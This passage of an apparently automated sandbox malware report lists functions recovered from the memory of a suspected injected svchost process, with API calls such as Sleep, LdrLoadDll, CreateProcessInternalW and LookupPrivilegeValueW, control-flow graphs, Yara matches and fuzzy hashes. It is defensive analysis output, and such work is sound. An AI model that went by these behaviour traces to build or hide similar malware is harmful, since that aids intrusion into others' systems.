                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 8b9640a7f88df52655d8c350fb611b4dc2d0f62071e45e0f24f84333461bf077
                        • Instruction ID: 985a876de79a5f02e78240cabf39aec826deb2eb99b50a82aede8bd017dfe0a7
                        • Opcode Fuzzy Hash: 8b9640a7f88df52655d8c350fb611b4dc2d0f62071e45e0f24f84333461bf077
                        • Instruction Fuzzy Hash: 1690026961304502E180B159940860A01459BD1242F91D415A0006558CCA5588696365
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 79ab0c1c31426360666b60c241808c210e9c697d7b875e5f5afdbff473895769
                        • Instruction ID: ae552a088380d6bfcf875bbce52122881ea9431855abcc6eee2979575fe77162
                        • Opcode Fuzzy Hash: 79ab0c1c31426360666b60c241808c210e9c697d7b875e5f5afdbff473895769
                        • Instruction Fuzzy Hash: DE90027171218902E110A159C40470601459BD1241F51C411A0815558D87D588917166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0bd7fd05e8c399372051308658b1b0eec8596096a4fa8108430db1ee7d63b27c
                        • Instruction ID: 35c6c50f22b2489efb947818c5069f4200a03668fa61fa9de368de3d66147ebc
                        • Opcode Fuzzy Hash: 0bd7fd05e8c399372051308658b1b0eec8596096a4fa8108430db1ee7d63b27c
                        • Instruction Fuzzy Hash: 7290027160608D42E140B1598404A4601559BD0345F51C011A0055694D97658D55B6A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7bd61cabbbc0d0b1e5592db5cf69cbb2f2ec0f298574e6a34afabb5254594018
                        • Instruction ID: fe7c32d3852c8e8d32b3b2da5e63bf14e70329852c247c610086a1fc022984e1
                        • Opcode Fuzzy Hash: 7bd61cabbbc0d0b1e5592db5cf69cbb2f2ec0f298574e6a34afabb5254594018
                        • Instruction Fuzzy Hash: 5F90027160204D02E180B159840464A01459BD1341F91C015A0016654DCB558A5977E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030696D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 24444ef21e1a86b79df5ddb222c8d9c8e0d73ff45103d00d4c94805be964f955
                        • Instruction ID: e406a4ea7580e8856ac2e6765c1cf06ab21db5225c155737e8b8a16a0faa2a33
                        • Opcode Fuzzy Hash: 24444ef21e1a86b79df5ddb222c8d9c8e0d73ff45103d00d4c94805be964f955
                        • Instruction Fuzzy Hash: B890027160204D42E100A1598404B4601459BE0341F51C016A0115654D8755C8517565
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9b13311c4bc23df442d1316662b2421566796d0707011b338a144dc0e44c1aca
                        • Instruction ID: fb9ad64a541da560ed72dea1556880d355abf40437770aea0fe0ed2c08a1fdfa
                        • Opcode Fuzzy Hash: 9b13311c4bc23df442d1316662b2421566796d0707011b338a144dc0e44c1aca
                        • Instruction Fuzzy Hash: 499002716020CD02E110A159C40474A01459BD0341F55C411A4415658D87D588917165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5eed3602fde381944ab4f20b2f28d367f9d04dd9f7b20c825e96ee34b13f4bb6
                        • Instruction ID: a259f89df9d61a595d46d9d87730220000c508ba5cc5116d9e43be8e7e6943ca
                        • Opcode Fuzzy Hash: 5eed3602fde381944ab4f20b2f28d367f9d04dd9f7b20c825e96ee34b13f4bb6
                        • Instruction Fuzzy Hash: CA900475713045031105F55D470450701C7DFD53D1351C031F1007550CD771CC717175
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c95055dc739e5720eae8428d43950dd25a515d44ed23bc9a613ad67ed7b37875
                        • Instruction ID: 26c3874096a4419dc88f9436f3fed5cb15d334817958add9bc1830182a30e2ae
                        • Opcode Fuzzy Hash: c95055dc739e5720eae8428d43950dd25a515d44ed23bc9a613ad67ed7b37875
                        • Instruction Fuzzy Hash: 1F9002A1603045035105B1598414616414A9BE0241B51C021E1005590DC66588917169
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02399040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 244 2399040-239906f 245 239907b-2399082 244->245 246 2399076 call 239bd00 244->246 247 2399088-23990d8 call 239bdd0 call 238ace0 call 2394e40 245->247 248 239915c-2399162 245->248 246->245 257 23990e0-23990f1 Sleep 247->257 258 23990f3-23990f9 257->258 259 2399156-239915a 257->259 260 23990fb-2399121 call 2398c60 258->260 261 2399123-2399143 258->261 259->248 259->257 262 2399149-239914c 260->262 261->262 263 2399144 call 2398e70 261->263 262->259 263->262
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 023990E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: 459a28475e4ac7a8502db391e27b3e37a43bf4d0fdafe441200a7263c5343303
                        • Instruction ID: a96bd9c871d6a837d0e4f2f473e4499dabd8d69964886168fcf687529ba4e743
                        • Opcode Fuzzy Hash: 459a28475e4ac7a8502db391e27b3e37a43bf4d0fdafe441200a7263c5343303
                        • Instruction Fuzzy Hash: 6731A1B2500704BBCB24DF64D885F67B7B9BB89B04F00801DF62A9B244D730A610CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02399036 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 266 2399036-2399038 267 239903a-2399082 call 239bd00 266->267 268 23990b6-23990d8 call 2394e40 266->268 273 2399088-23990b4 call 239bdd0 call 238ace0 267->273 274 239915c-2399162 267->274 277 23990e0-23990f1 Sleep 268->277 273->268 279 23990f3-23990f9 277->279 280 2399156-239915a 277->280 283 23990fb-2399121 call 2398c60 279->283 284 2399123-2399143 279->284 280->274 280->277 285 2399149-239914c 283->285 284->285 286 2399144 call 2398e70 284->286 285->280 286->285
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 023990E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: e4aa825218a6b7ed45a0c1b50daf3f55f6296d5e290d5f93140b0578839debec
                        • Instruction ID: 163b9134253dcfd25820c1d9d04ba72e089c5659f477337592ffe8363e9ff66f
                        • Opcode Fuzzy Hash: e4aa825218a6b7ed45a0c1b50daf3f55f6296d5e290d5f93140b0578839debec
                        • Instruction Fuzzy Hash: 3831D2B2900345ABCF24EF64D8C5B67B7B9FF89B04F10802DE6295B245C774A511CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A622 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 295 239a622-239a646 297 239a64c-239a661 RtlFreeHeap 295->297 298 239a647 call 239af20 295->298 298->297
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02383AF8), ref: 0239A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: a1750e690e6ab0dfa2208fa7330b66514012c64d942669476c76aba097f15414
                        • Instruction ID: c4686b583ff81c97f5b06ed687f05cb4f6667f3207ce074a8fe3ef6d3cb4eeb8
                        • Opcode Fuzzy Hash: a1750e690e6ab0dfa2208fa7330b66514012c64d942669476c76aba097f15414
                        • Instruction Fuzzy Hash: F2E06DB2210308ABCB14EF95CC45E9B33A8AF88310F118545FD185B241C631E801CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 299 239a630-239a661 call 239af20 RtlFreeHeap
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02383AF8), ref: 0239A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction ID: ad1556d08047e53db412cb773c8ae65b16fdcbfc05401e38d6e3fd82b1f35aa0
                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction Fuzzy Hash: 0CE04FB22003046BDB14DF59DC44EA777ADEF88750F014554FD0957241C630F910CAF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02388308 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 2388308-238831f 303 2388328-238835a call 239c9c0 call 238ace0 call 2394e40 302->303 304 2388323 call 239be20 302->304 311 238835c-238836e PostThreadMessageW 303->311 312 238838e-2388392 303->312 304->303 313 238838d 311->313 314 2388370-238838b call 238a470 PostThreadMessageW 311->314 313->312 314->313
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238838B
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 1fb7f51d22c3ed4b3e4a16b28433f9dfe426715fcb41b7eb9e8942fa834cad60
                        • Instruction ID: f3216b2764f5767822e3aaad01345f0c99695ef6f488a74490776d66323e0605
                        • Opcode Fuzzy Hash: 1fb7f51d22c3ed4b3e4a16b28433f9dfe426715fcb41b7eb9e8942fa834cad60
                        • Instruction Fuzzy Hash: A601B132A802287AEB35A6A49C42FFEAB6D9B41B55F040519FB04FF1C1D6E469064AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02388310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 317 2388310-238831f 318 2388328-238835a call 239c9c0 call 238ace0 call 2394e40 317->318 319 2388323 call 239be20 317->319 326 238835c-238836e PostThreadMessageW 318->326 327 238838e-2388392 318->327 319->318 328 238838d 326->328 329 2388370-238838b call 238a470 PostThreadMessageW 326->329 328->327 329->328
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238838B
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
                        • Instruction ID: e5d2610e97f28035de1b783f3f0005d80aea04c8516569e69a99bbdec62d258b
                        • Opcode Fuzzy Hash: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
                        • Instruction Fuzzy Hash: 13018F31A803287BEB20B6949C02FBEB76D6B41F55F040519FF04BA1C1E6A469064AE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 023882A6 Relevance: 3.1, APIs: 2, Instructions: 51threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 332 23882a6-23882ac 333 2388328-238835a call 239c9c0 call 238ace0 call 2394e40 332->333 334 23882ae-23882af 332->334 341 238835c-238836e PostThreadMessageW 333->341 342 238838e-2388392 333->342 334->333 343 238838d 341->343 344 2388370-238838b call 238a470 PostThreadMessageW 341->344 343->342 344->343
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238838B
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: d5eacfa9f5c46faba9d1e7ceebd69ccdc9f642353195563a4e809e9b8a2a4126
                        • Instruction ID: c94707fc85360904d79615d94672f3a621d17e87aa0a2568be23077f5c30d1e0
                        • Opcode Fuzzy Hash: d5eacfa9f5c46faba9d1e7ceebd69ccdc9f642353195563a4e809e9b8a2a4126
                        • Instruction Fuzzy Hash: 8001A432A803287AEB216A94AC42FFE732CAB41B51F45051AFF04FF5C1D6E469064AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0238ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 542 238ace0-238ad09 call 239cc10 545 238ad0b-238ad0e 542->545 546 238ad0f-238ad1d call 239d030 542->546 549 238ad2d-238ad3e call 239b460 546->549 550 238ad1f-238ad2a call 239d2b0 546->550 555 238ad40-238ad54 LdrLoadDll 549->555 556 238ad57-238ad5a 549->556 550->549 555->556
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0238AD52
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction ID: 8b8af4ac60389528d002b7cb4e456b605890f58b0db229f8ca8a1cd7db28c437
                        • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction Fuzzy Hash: 3D0121B5E0020DABDF10EBE4DD41FDEB7799B55308F1045A6E9089B240FA71E758CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0239A6F4
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 01713c17ef9ca91e796b143b8003efe668a58006398a41fd7325c9c9f7e7f789
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: 30015FB2214208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97255D630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A738 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F1C2,0238F1C2,?,00000000,?,?), ref: 0239A7C0
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 2bf34663b2aad34d0931407289429a6908d770d61b8443b7c270200a0911d235
                        • Instruction ID: 3847056cf63fac45fa7168f2d10acba37801b45a1f95319fd412e78d612277d4
                        • Opcode Fuzzy Hash: 2bf34663b2aad34d0931407289429a6908d770d61b8443b7c270200a0911d235
                        • Instruction Fuzzy Hash: 49F017B6200118AFDB24DFA9DC81EEB77ADEF88254F118259FA0D97241C631E815CBB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02399170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0238F040,?,?,00000000), ref: 023991AC
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 622e455f62551a298582fe45d05a7a03294a3630e965f56f38a7c3521e18a4e6
                        • Instruction ID: d3af4b8e263cb3dd242427bcd84b0e649fba0f88cc0ff2b6b2492f52f1650b7d
                        • Opcode Fuzzy Hash: 622e455f62551a298582fe45d05a7a03294a3630e965f56f38a7c3521e18a4e6
                        • Instruction Fuzzy Hash: 52E092333803043AE7306599AC02FA7B39DDB92B24F14002AFB0DEB6C0D595F80246E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A781 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F1C2,0238F1C2,?,00000000,?,?), ref: 0239A7C0
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 1390492eda279349b5f1356f9c415c2c35538682f1dab37789e8f15b29cb8bc3
                        • Instruction ID: ed2ce47162e21825d340a3eb3f27570357a157cb5bf5d61b13c1e8346da0dbd7
                        • Opcode Fuzzy Hash: 1390492eda279349b5f1356f9c415c2c35538682f1dab37789e8f15b29cb8bc3
                        • Instruction Fuzzy Hash: 87F0A0B22012146FDB11DF85CC41FE73B699F46310F018595F90D57243D532E915C7B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02399172 Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0238F040,?,?,00000000), ref: 023991AC
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: ab5337d4e631314633f49da3c57175a679bbdc57c35205b8fc6b9e7220d2d3db
                        • Instruction ID: 4f313c45768a5d9fcb82e329403853b94ed687343f7b80d3be1e60d800ecbc0b
                        • Opcode Fuzzy Hash: ab5337d4e631314633f49da3c57175a679bbdc57c35205b8fc6b9e7220d2d3db
                        • Instruction Fuzzy Hash: 42E086777803003AE7306558AC02FF7739D9B92F14F150129FB49EB6C0D5A5F8424AE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0238F6B7 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,02388D14,?), ref: 0238F6EB
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: e641a3ee06fe069aa9b48756013b17a558677eb717b226dbf556287c846394d0
                        • Instruction ID: 3d3c664557f6cb400691125c46cf245dac93502dbcd8b9c2553e57d76af896a8
                        • Opcode Fuzzy Hash: e641a3ee06fe069aa9b48756013b17a558677eb717b226dbf556287c846394d0
                        • Instruction Fuzzy Hash: 49E0C2B2B803002BFA24FAA89C02F663385DB6AA89FAD0538F50DDB3C3DA15C6014524
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F1C2,0238F1C2,?,00000000,?,?), ref: 0239A7C0
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: 9a6f48f6545e5e4b874a8796544a80f15348512e72bc82167a7915967a41d71c
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: 9DE01AB22002086BDB20DF49DC84EE737ADAF89650F018154BE0957241C930E8108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(02394526,?,02394C9F,02394C9F,?,02394526,?,?,?,?,?,00000000,00000000,?), ref: 0239A61D
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction ID: 53063c6a84b4f06c06b4e2fce0da445f02f08938fd968d2e0e0a9942772ffc8e
